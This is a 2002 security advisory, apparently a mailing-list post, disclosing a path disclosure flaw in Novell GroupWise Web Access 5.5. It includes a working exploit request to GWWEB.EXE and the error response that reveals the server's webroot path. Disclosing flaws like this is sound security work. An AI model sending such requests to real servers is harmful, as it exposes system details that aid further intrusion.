SecurityOffice Security Advisory:// Novell GroupWise Web Access Path Disclosure Vulnerability

["Tamer Sahin" <ts () securityoffice net>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Novell GroupWise Web Access Path Disclosure Vulnerability

Type:

Input Validation Error

Release Date:

February 28, 2002

Product / Vendor:

Novell GroupWise, the premier communication and collaboration tool
for the one Net environment, helps you tackle some of the toughest
business challenges you face. Whether your organization is small,
midsize or large, your employees need e-mail, calendaring, document
management and other collaborative tools to open up the lines of
communication and keep your business running efficiently. 

http://www.novell.com/products/groupwise/

Summary:

If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the GroupWise
Web Access.

Exploit:

GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file
SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

Tested:

Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5

Vulnerable:

GroupWise Web Access 5.5 (And may be other.)

Disclaimer:

http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.

Author:

Tamer Sahin
ts () securityoffice net
http://www.securityoffice.net

Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPH1sPLuLpFMrXtywEQJzlgCfTn8RnbkHJDYUkbt28B4gT58Jpp4AoMzT
SQKOfafzkyXrQUMO9bw80DMN
=w9Rd
-----END PGP SIGNATURE-----